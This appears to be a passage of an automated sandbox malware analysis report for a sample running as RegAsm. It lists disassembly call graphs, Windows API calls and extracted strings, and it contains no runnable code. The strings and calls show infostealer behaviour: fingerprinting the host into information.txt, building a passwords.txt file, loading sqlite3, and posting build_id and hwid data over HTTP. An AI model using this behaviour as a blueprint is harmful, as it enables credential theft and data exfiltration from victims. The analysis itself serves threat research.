410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                        • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                        • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                        • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                        • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                        • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                        • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                        • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                        • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                        • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                        • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                        • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                        • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                      • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                        • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                        • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                        • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                        • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                        • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                        • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                        • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                        • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                        • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                        • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                        • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                        • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                        • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                        • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                        • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                        • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                        • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                        • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                        • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                        • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                        • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                        • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                        • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                        • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                        • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                        • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                        • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                        • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                        • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                        • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                        • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                        • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                        • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                        • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                        • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                        • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                        • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                        • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                        • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                        • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                        • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                        • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                        • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                        • Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
                                                                                        • Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB
                                                                                        • Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
                                                                                        • Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC
                                                                                        • Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                        • Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                        • Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                        • Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A
                                                                                        • Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9
                                                                                        • Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                        • Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                        • Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                        • Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                        • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                        • Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                        • Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
                                                                                        • Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                        • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                        • Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347
                                                                                        • Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563
                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                      • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                      • API String ID: 3279995179-1014693891
                                                                                      • Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                      • Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
                                                                                      • Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
                                                                                      • Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
                                                                                        • Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
                                                                                        • Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
                                                                                      • Sleep.KERNEL32(0000EA60), ref: 00416BFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrlen$lstrcpy$Sleep
                                                                                      • String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                      • API String ID: 2840494320-4129404369
                                                                                      • Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                      • Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
                                                                                      • Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
                                                                                      • Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
                                                                                      • lstrlenA.KERNEL32(?), ref: 004086CB
                                                                                      • lstrcatA.KERNEL32(?), ref: 004086E4
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004086EE
                                                                                      • lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00408704
                                                                                      • lstrcatA.KERNEL32(?,004371A0), ref: 00408710
                                                                                      • lstrcatA.KERNEL32(?), ref: 0040871D
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00408727
                                                                                      • lstrcatA.KERNEL32(?,004371A4), ref: 00408733
                                                                                      • lstrcatA.KERNEL32(?), ref: 00408740
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040874A
                                                                                      • lstrcatA.KERNEL32(?,004371A8), ref: 00408756
                                                                                      • lstrcatA.KERNEL32(?), ref: 00408763
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0040876D
                                                                                      • lstrcatA.KERNEL32(?,004371AC), ref: 00408779
                                                                                      • lstrcatA.KERNEL32(?,004371B0), ref: 00408785
                                                                                      • lstrlenA.KERNEL32(?), ref: 004087BE
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040880B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                      • String ID: passwords.txt
                                                                                      • API String ID: 1956182324-347816968
                                                                                      • Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                      • Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
                                                                                      • Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
                                                                                      • Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2613 404b2e-404bf3 call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 2628 404bf5 2613->2628 2629 404bfb-404c01 2613->2629 2628->2629 2630 405194-405236 InternetCloseHandle call 402920 * 8 call 41d016 2629->2630 2631 404c07-404d91 call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 2629->2631 2631->2630 2700 404d97-404dd1 HttpOpenRequestA 2631->2700 2701 404dd7-404ddd 2700->2701 2702 405188-40518e InternetCloseHandle 2700->2702 2703 404dfb-40511a call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 4104e7 call 4105c7 * 2 call 41058d call 402920 * 2 lstrlenA * 2 HttpSendRequestA 2701->2703 2704 404ddf-404df5 InternetSetOptionA 2701->2704 2702->2630 2807 40515c-405174 InternetReadFile 2703->2807 2704->2703 2808 405176-405183 InternetCloseHandle call 402920 2807->2808 2809 40511c-405124 2807->2809 2808->2702 2809->2808 2811 405126-405157 call 410609 call 41058d call 402920 2809->2811 2811->2807
                                                                                      APIs
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                      • lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                      • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                      • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
